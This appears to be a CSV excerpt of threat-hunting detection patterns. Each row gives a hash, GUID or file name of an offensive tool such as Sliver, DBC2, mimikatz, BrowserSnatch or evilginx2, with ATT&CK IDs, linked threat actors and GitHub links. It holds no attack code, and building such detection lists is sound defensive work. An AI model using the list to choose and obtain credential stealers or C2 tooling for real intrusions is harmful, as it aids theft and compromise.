"*dbc10feaef6ccaf49866bac8d3ddc48729e7163639d6e0fcdad9e8f90178896b*",".{0,1000}dbc10feaef6ccaf49866bac8d3ddc48729e7163639d6e0fcdad9e8f90178896b.{0,1000}","offensive_tool_keyword","brutespray","BruteSpray takes nmap GNMAP/XML output or newline seperated JSONS and automatically brute-forces services with default credentials using Medusa. BruteSpray can even find non-standard ports by using the -sV inside Nmap.","T1110","TA0001 - TA0043","N/A","N/A","Credential Access","https://github.com/x90skysn3k/brutespray","1","0","#filehash","N/A","10","10","2231","405","2025-04-21T03:17:20Z","2017-04-05T17:05:10Z","40266"
"*DBC2.git*",".{0,1000}DBC2\.git.{0,1000}","offensive_tool_keyword","DBC2","DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.","T1105 - T1071.004 - T1102","TA0003 - TA0002 - TA0008","N/A","BlackCat - Scattered Spider*","C2","https://github.com/Arno0x/DBC2","1","1","N/A","N/A","10","10","295","86","2017-10-27T07:39:02Z","2016-12-14T10:35:56Z","40267"
"*dbc2_agent.cs*",".{0,1000}dbc2_agent\.cs.{0,1000}","offensive_tool_keyword","DBC2","DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.","T1105 - T1071.004 - T1102","TA0003 - TA0002 - TA0008","N/A","BlackCat - Scattered Spider*","C2","https://github.com/Arno0x/DBC2","1","1","N/A","N/A","10","10","295","86","2017-10-27T07:39:02Z","2016-12-14T10:35:56Z","40268"
"*dbc2_agent.exe*",".{0,1000}dbc2_agent\.exe.{0,1000}","offensive_tool_keyword","DBC2","DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.","T1105 - T1071.004 - T1102","TA0003 - TA0002 - TA0008","N/A","BlackCat - Scattered Spider*","C2","https://github.com/Arno0x/DBC2","1","1","N/A","N/A","10","10","295","86","2017-10-27T07:39:02Z","2016-12-14T10:35:56Z","40269"
"*dbc2Loader.dll*",".{0,1000}dbc2Loader\.dll.{0,1000}","offensive_tool_keyword","DBC2","DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.","T1105 - T1071.004 - T1102","TA0003 - TA0002 - TA0008","N/A","BlackCat - Scattered Spider*","C2","https://github.com/Arno0x/DBC2","1","1","N/A","N/A","10","10","295","86","2017-10-27T07:39:02Z","2016-12-14T10:35:56Z","40270"
"*dbc2Loader.exe*",".{0,1000}dbc2Loader\.exe.{0,1000}","offensive_tool_keyword","DBC2","DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.","T1105 - T1071.004 - T1102","TA0003 - TA0002 - TA0008","N/A","BlackCat - Scattered Spider*","C2","https://github.com/Arno0x/DBC2","1","1","N/A","N/A","10","10","295","86","2017-10-27T07:39:02Z","2016-12-14T10:35:56Z","40271"
"*dbc2Loader.tpl*",".{0,1000}dbc2Loader\.tpl.{0,1000}","offensive_tool_keyword","DBC2","DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.","T1105 - T1071.004 - T1102","TA0003 - TA0002 - TA0008","N/A","BlackCat - Scattered Spider*","C2","https://github.com/Arno0x/DBC2","1","1","N/A","N/A","10","10","295","86","2017-10-27T07:39:02Z","2016-12-14T10:35:56Z","40272"
"*dbc2LoaderWrapperCLR.*",".{0,1000}dbc2LoaderWrapperCLR\..{0,1000}","offensive_tool_keyword","DBC2","DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.","T1105 - T1071.004 - T1102","TA0003 - TA0002 - TA0008","N/A","BlackCat - Scattered Spider*","C2","https://github.com/Arno0x/DBC2","1","1","N/A","N/A","10","10","295","86","2017-10-27T07:39:02Z","2016-12-14T10:35:56Z","40273"
"*dbc2LoaderWrapperCLR_x64.dll*",".{0,1000}dbc2LoaderWrapperCLR_x64\.dll.{0,1000}","offensive_tool_keyword","DBC2","DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.","T1105 - T1071.004 - T1102","TA0003 - TA0002 - TA0008","N/A","BlackCat - Scattered Spider*","C2","https://github.com/Arno0x/DBC2","1","1","N/A","N/A","10","10","295","86","2017-10-27T07:39:02Z","2016-12-14T10:35:56Z","40274"
"*dbc2LoaderWrapperCLR_x86.dll*",".{0,1000}dbc2LoaderWrapperCLR_x86\.dll.{0,1000}","offensive_tool_keyword","DBC2","DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.","T1105 - T1071.004 - T1102","TA0003 - TA0002 - TA0008","N/A","BlackCat - Scattered Spider*","C2","https://github.com/Arno0x/DBC2","1","1","N/A","N/A","10","10","295","86","2017-10-27T07:39:02Z","2016-12-14T10:35:56Z","40275"
"*DBC2-master.zip*",".{0,1000}DBC2\-master\.zip.{0,1000}","offensive_tool_keyword","DBC2","DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.","T1105 - T1071.004 - T1102","TA0003 - TA0002 - TA0008","N/A","BlackCat - Scattered Spider*","C2","https://github.com/Arno0x/DBC2","1","1","N/A","N/A","10","10","295","86","2017-10-27T07:39:02Z","2016-12-14T10:35:56Z","40276"
"*dBCSPwd*aad3b435b51404eeaad3b435b51404ee*",".{0,1000}dBCSPwd.{0,1000}aad3b435b51404eeaad3b435b51404ee.{0,1000}","offensive_tool_keyword","ntdissector","Ntdissector is a tool for parsing records of an NTDS database. Records are dumped in JSON format and can be filtered by object class.","T1003.003","TA0006 ","N/A","N/A","Credential Access","https://github.com/synacktiv/ntdissector","1","0","N/A","N/A","9","2","139","17","2024-08-16T14:18:35Z","2023-09-05T12:13:47Z","40277"
"*dbd58dba5d92e8d7b6c8dfc6fc54185c33ef8442c61e02f4448bf9641643e596*",".{0,1000}dbd58dba5d92e8d7b6c8dfc6fc54185c33ef8442c61e02f4448bf9641643e596.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","40278"
"*dbd96cb386138d0f8215e5a6d0b6bc23aa23056385a1da5deac1b8134d6f157e*",".{0,1000}dbd96cb386138d0f8215e5a6d0b6bc23aa23056385a1da5deac1b8134d6f157e.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","40279"
"*dbe6ffef155b82e83cf856b5bce79dab6f8f1fcec912274e7a96b477446e3717*",".{0,1000}dbe6ffef155b82e83cf856b5bce79dab6f8f1fcec912274e7a96b477446e3717.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","0","#filehash","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","40282"
"*dbeab309b7ecd219233a56c43b0c95f88a39c7d1d524d5f71d319a5928a2b5ad*",".{0,1000}dbeab309b7ecd219233a56c43b0c95f88a39c7d1d524d5f71d319a5928a2b5ad.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","40286"
"*dbed4217e61d4deba7cfb5aa97aef6687507d9bd990110cc31b0d35ee32acada*",".{0,1000}dbed4217e61d4deba7cfb5aa97aef6687507d9bd990110cc31b0d35ee32acada.{0,1000}","offensive_tool_keyword","Keethief","Allows for the extraction of KeePass 2.X key material from memory as well as the backdooring and enumeration of the KeePass trigger system.","T1003 - T1055 - T1059 - T1070","TA0006 - TA0005 - TA0008","N/A","EvilCorp* - APT20","Credential Access","https://github.com/GhostPack/KeeThief","1","0","#filehash","N/A","10","10","944","154","2020-11-18T18:35:21Z","2016-07-10T19:11:23Z","40287"
"*dbf5c14d8ea7fe326f57fbe2b2e140367d7cd6003cbab42bf4bf11de50b52359*",".{0,1000}dbf5c14d8ea7fe326f57fbe2b2e140367d7cd6003cbab42bf4bf11de50b52359.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","40289"
"*dbf75975cedefebfbc67ebc49ea438821e8835a8ea6b4b922e473861cf72edf7*",".{0,1000}dbf75975cedefebfbc67ebc49ea438821e8835a8ea6b4b922e473861cf72edf7.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","40290"
"*dbf7d95c705622042a557724ccaeca139cdf0f95603ba67ea1db10ba4ec414ff*",".{0,1000}dbf7d95c705622042a557724ccaeca139cdf0f95603ba67ea1db10ba4ec414ff.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","40292"
"*dbGetNimplant*",".{0,1000}dbGetNimplant.{0,1000}","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","Black Basta","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","N/A","10","10","871","111","2025-03-28T18:53:57Z","2023-02-13T13:42:39Z","40293"
"*dc07fa75e50a2b71b6e6163c0052fbeef8aa20896af6346a6646692d09bcc06b*",".{0,1000}dc07fa75e50a2b71b6e6163c0052fbeef8aa20896af6346a6646692d09bcc06b.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","#filehash","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","40294"
"*dc12cf2c161aea6ad015a11593b74603e25a4c7754b96b3d3b4062bd0e5d5a09*",".{0,1000}dc12cf2c161aea6ad015a11593b74603e25a4c7754b96b3d3b4062bd0e5d5a09.{0,1000}","offensive_tool_keyword","BrowserSnatch","steals important data from all chromium and gecko browsers installed in the system and gather the data in a stealer db to be exfiltrated out. A powerful Browser Stealer","T1081 - T1074 - T1114 - T1005 - T1041 - T1027","TA0006 - TA0009 - TA0010","N/A","N/A","Data Exfiltration","https://github.com/shaddy43/BrowserSnatch","1","0","#filehash","N/A","10","3","246","39","2025-03-31T21:04:30Z","2024-08-26T18:38:42Z","40297"
"*DC199D9E-CF10-41DD-BBCD-98E71BA8679D*",".{0,1000}DC199D9E\-CF10\-41DD\-BBCD\-98E71BA8679D.{0,1000}","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","Malware","https://github.com/qwqdanchun/DcRat","1","0","#GUIDproject","N/A","10","10","968","332","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z","40298"
"*DC199D9E-CF10-41DD-BBCD-98E71BA8679D*",".{0,1000}DC199D9E\-CF10\-41DD\-BBCD\-98E71BA8679D.{0,1000}","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","Malware","https://github.com/qwqdanchun/DcRat","1","0","#GUIDproject","N/A","10","10","968","332","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z","40299"
"*dc1baea53709f425ba181705c3f6c37d4840e3e88d71a5e3b39ee40948f12e87*",".{0,1000}dc1baea53709f425ba181705c3f6c37d4840e3e88d71a5e3b39ee40948f12e87.{0,1000}","offensive_tool_keyword","reverse-ssh","Statically-linked ssh server with reverse shell functionality for CTFs and such","T1105 - T1572 - T1569.002 - T1090","TA0001 - TA0002 - TA0003 - TA0010 - TA0011 - TA0005 ","N/A","N/A","C2","https://github.com/Fahrj/reverse-ssh","1","0","#filehash","N/A","10","10","961","141","2023-02-15T00:16:25Z","2021-07-12T18:26:29Z","40300"
"*dc1bce76ba20f6d3a7020b35f18d47a74597018b0e58a9b1aff6d77be72f4a44*",".{0,1000}dc1bce76ba20f6d3a7020b35f18d47a74597018b0e58a9b1aff6d77be72f4a44.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","40301"
"*dc20294fe264fea6841e0aed2560f0b995070f9bc680d170932ef50e05ef0690*",".{0,1000}dc20294fe264fea6841e0aed2560f0b995070f9bc680d170932ef50e05ef0690.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","40303"
"*dc229f8b0113731ba7d73a24c9951a9511067c151fdff7f4bb3b3ec8a55fb287*",".{0,1000}dc229f8b0113731ba7d73a24c9951a9511067c151fdff7f4bb3b3ec8a55fb287.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","40305"
"*dc23ff9df3352509e1d8c461f0ac98fe52c1d5ab5c264c047da4afc2cd6df87c*",".{0,1000}dc23ff9df3352509e1d8c461f0ac98fe52c1d5ab5c264c047da4afc2cd6df87c.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","40306"
"*dc25fef1e036e80dbbf1a5665fa13dc1ed6f8c56875161608cdf532d8a21a4a5*",".{0,1000}dc25fef1e036e80dbbf1a5665fa13dc1ed6f8c56875161608cdf532d8a21a4a5.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER - Black Basta","Phishing","https://github.com/An0nUD4Y/evilginx2","1","0","#filehash","N/A","10","","N/A","","","","40307"
"*dc2b0f4a1f3c1c8a209fec149e05aec9f9a387ec7224e593552c19ec03dd630f*",".{0,1000}dc2b0f4a1f3c1c8a209fec149e05aec9f9a387ec7224e593552c19ec03dd630f.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","#filehash","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","40308"
"*dc2d30a37a77a23ba928d9191bb54740f760396b46bb862b841bf22b857e9884*",".{0,1000}dc2d30a37a77a23ba928d9191bb54740f760396b46bb862b841bf22b857e9884.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","40309"
"*dc2dd05cc2f6dea85f0bfc16b0e1008687a32fd92f49f0043ca60a061fd59c66*",".{0,1000}dc2dd05cc2f6dea85f0bfc16b0e1008687a32fd92f49f0043ca60a061fd59c66.{0,1000}","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy","T1068 - T1548.004 - T1611 - T1203 - T1059.004","TA0004 - TA0001 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/liamg/traitor","1","0","#linux #filehash","N/A","10","10","6853","651","2024-03-12T21:01:14Z","2021-01-24T10:50:15Z","40310"
"*dc3c1af9-ea3d-4401-9158-eb6dda735276*",".{0,1000}dc3c1af9\-ea3d\-4401\-9158\-eb6dda735276.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Mostly abused by attackers ","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#GUIDproject","N/A","9","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","40314"
"*dc3d98a8e8c0b0944291f9b462f552f174261982c4507f2de1ee9503353d10e9*",".{0,1000}dc3d98a8e8c0b0944291f9b462f552f174261982c4507f2de1ee9503353d10e9.{0,1000}","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","#filehash","N/A","8","5","440","61","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z","40315"
"*DC3E0E14-6342-41C9-BECC-3653BF533CCC*",".{0,1000}DC3E0E14\-6342\-41C9\-BECC\-3653BF533CCC.{0,1000}","offensive_tool_keyword","PredatorTheStealer","C++ stealer (passwords - cookies - forms - cards - wallets) ","T1078 - T1114 - T1555 - T1539 - T1212 - T1132","TA0006  - TA0010","N/A","N/A","Credential Access","https://github.com/SecUser1/PredatorTheStealer","1","0","#GUIDproject","N/A","8","1","11","2","2022-12-06T16:46:33Z","2022-12-06T16:34:43Z","40316"
"*dc48cbd7466cffbd9ec80dd26109b9e633b9bb02e73d8db992e2e5c83ff81bdb*",".{0,1000}dc48cbd7466cffbd9ec80dd26109b9e633b9bb02e73d8db992e2e5c83ff81bdb.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043  - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","40318"
"*dc56b9ac51cdacc0157d4180275cefb938e8476356a46b1faed2fddfb5d1907d*",".{0,1000}dc56b9ac51cdacc0157d4180275cefb938e8476356a46b1faed2fddfb5d1907d.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","#filehash","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","40319"
"*dc5a1f72ecaa1cddb1df73ddd075819eb5d2d35f95ea11639cfa1e189ed15217*","","offensive_tool_keyword","atexec-pro","Fileless atexec for lateral movement","T1021.002 - T1105","TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/Ridter/atexec-pro","1","0","#filehash","N/A","10","4","366","45","2024-03-28T03:36:50Z","2024-03-27T09:15:00Z","40321"
"*dc5d95d4ce6cee631b546e1bbfa9f090f66e4167edd5dd828f567c7fc30978dc*",".{0,1000}dc5d95d4ce6cee631b546e1bbfa9f090f66e4167edd5dd828f567c7fc30978dc.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","Earth Lusca","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","#filehash","N/A","8","10","11931","1725","2025-04-20T11:30:29Z","2020-11-13T16:35:20Z","40322"
"*DC6187CB-D5DF-4973-84A2-F92AAE90CDA9*",".{0,1000}DC6187CB\-D5DF\-4973\-84A2\-F92AAE90CDA9.{0,1000}","offensive_tool_keyword","HellsGate","The Hell's Gate technique is a method employed by malware to hide its malicious behavior and avoid detection. This technique involves executing system calls directly thus bypassing the Windows API (Application Programming Interface) which is typically monitored by EDRs","T1055 - T1548.002 - T1129","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/am0nsec/HellsGate","1","0","#GUIDproject","N/A","N/A","10","1028","121","2021-06-28T15:42:36Z","2020-06-02T17:10:21Z","40323"
"*DC6187CB-D5DF-4973-84A2-F92AAE90CDA9*",".{0,1000}DC6187CB\-D5DF\-4973\-84A2\-F92AAE90CDA9.{0,1000}","offensive_tool_keyword","TartarusGate","TartarusGate Bypassing EDRs","T1055 - T1218.011 - T1027.009 - T1027 - T1105 - T1102.001","TA0005 - TA0001 - TA0002 - TA0009","N/A","N/A","Defense Evasion","https://github.com/trickster0/TartarusGate","1","0","#GUIDproject","N/A","10","6","579","72","2022-01-25T20:54:28Z","2021-11-27T19:46:30Z","40324"
"*dc6471615591b2fca412d411535f597485b37854f602dadac37da3aee4fb0e45*",".{0,1000}dc6471615591b2fca412d411535f597485b37854f602dadac37da3aee4fb0e45.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","40325"
"*dc713dd00f6dd0dbf2edb9ec5db8749e996a665356e8c6d595b6558b8864b06a*",".{0,1000}dc713dd00f6dd0dbf2edb9ec5db8749e996a665356e8c6d595b6558b8864b06a.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","40326"
"*dc7b3b918bee32e7dac453ec8f60269d7c3502ce48e312f233651ce930ee68e0*",".{0,1000}dc7b3b918bee32e7dac453ec8f60269d7c3502ce48e312f233651ce930ee68e0.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","40328"
"*dc86081b57b7809bfd3df4c8ed664ca0a786a239bdb522ea129f66571f4fd992*",".{0,1000}dc86081b57b7809bfd3df4c8ed664ca0a786a239bdb522ea129f66571f4fd992.{0,1000}","offensive_tool_keyword","brutespray","BruteSpray takes nmap GNMAP/XML output or newline seperated JSONS and automatically brute-forces services with default credentials using Medusa. BruteSpray can even find non-standard ports by using the -sV inside Nmap.","T1110","TA0001 - TA0043","N/A","N/A","Credential Access","https://github.com/x90skysn3k/brutespray","1","0","#filehash","N/A","10","10","2231","405","2025-04-21T03:17:20Z","2017-04-05T17:05:10Z","40329"
"*dc89b02f14f9f44483c863df6965528f3f7f1efbdcbe31db757c6a295e706b33*",".{0,1000}dc89b02f14f9f44483c863df6965528f3f7f1efbdcbe31db757c6a295e706b33.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","40330"
"*dc8b8a51cb8c46c8a57a596d9c970eed5288b0378418c10cb98b5db399513b5a*",".{0,1000}dc8b8a51cb8c46c8a57a596d9c970eed5288b0378418c10cb98b5db399513b5a.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","#filehash","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","40331"
"*dc8e495f3d1ee0060009f69bcdc8b60265879d41d20dd0367a638a101d3a19c6*",".{0,1000}dc8e495f3d1ee0060009f69bcdc8b60265879d41d20dd0367a638a101d3a19c6.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","40333"
